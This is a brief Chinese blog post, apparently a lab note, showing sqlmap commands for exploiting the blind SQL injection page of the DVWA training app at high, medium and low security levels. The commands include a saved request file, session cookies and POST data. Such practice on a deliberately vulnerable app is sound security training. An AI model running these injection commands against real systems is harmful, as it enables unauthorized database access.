dvwa kali SQL注入

  • 开发
  • 32

high:

1.txt的来源

1.txt的内容

手动添加:

id=1&Submit=Submit
执行:

sqlmap -r /root/1.txt -p id  --second-url "http://192.168.159.128:20000/vulnerabilities/sqli_blind/"  --batch

 

medium:

换链接,换cookie,换data

sqlmap -u "http://192.168.159.128:20000/vulnerabilities/sqli_blind/#" --cookie="PHPSESSID=4fn7qisd6b091hatapqf3nhm54; security=medium" --data "id=1&Submit=Submit" --batch
 

low:

换链接,换cookie,换data

sqlmap -u "http://192.168.159.128:20000/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=4fn7qisd6b091hatapqf3nhm54; security=low" --batch

阅读全部

相关推荐

  3. sql<span style='color:red;'>注入</span>

    sql注入

    2024-05-01 13:22:04      55 阅读
  4. SQL<span style='color:red;'>注入</span>

    SQL注入

    2024-05-01 13:22:04      52 阅读

  5. GraphQL注入

    2024-05-01 13:22:04       35 阅读

  6. SQL注入

    2024-05-01 13:22:04       39 阅读
  7. SQL<span style='color:red;'>注入</span>

    SQL注入

    2024-05-01 13:22:04      40 阅读

  10. SQL 注入攻击 - insert注入

    2024-05-01 13:22:04       51 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-01 13:22:04       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-01 13:22:04       106 阅读

  9. 在Django里面运行非项目文件

    2024-05-01 13:22:04       87 阅读

  19. Python语言-面向对象

    2024-05-01 13:22:04       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-05-01 13:22:04       91 阅读

热门阅读

  3. Linux 系统上安装 NVIDIA 驱动程序失败(X server问题)

    2024-05-01 13:22:04       36 阅读

  5. react中解决 Capture Value 问题

    2024-05-01 13:22:04       35 阅读

  10. FAISS原理和使用总结

    2024-05-01 13:22:04       34 阅读

  12. Linux pppsetup命令教程:如何轻松设置PPP连线(附实例详解和注意事项)

    2024-05-01 13:22:04       37 阅读

  17. H.264码流解析

    2024-05-01 13:22:04       30 阅读

  22. Nacos和Eureka有什么区别

    2024-05-01 13:22:04       32 阅读

  23. 指代消解原理

    2024-05-01 13:22:04       28 阅读

  25. Day41 HTTP编程

    2024-05-01 13:22:04       32 阅读

  28. 邦芒面试:面试时,如何展现卓越的口才

    2024-05-01 13:22:04       30 阅读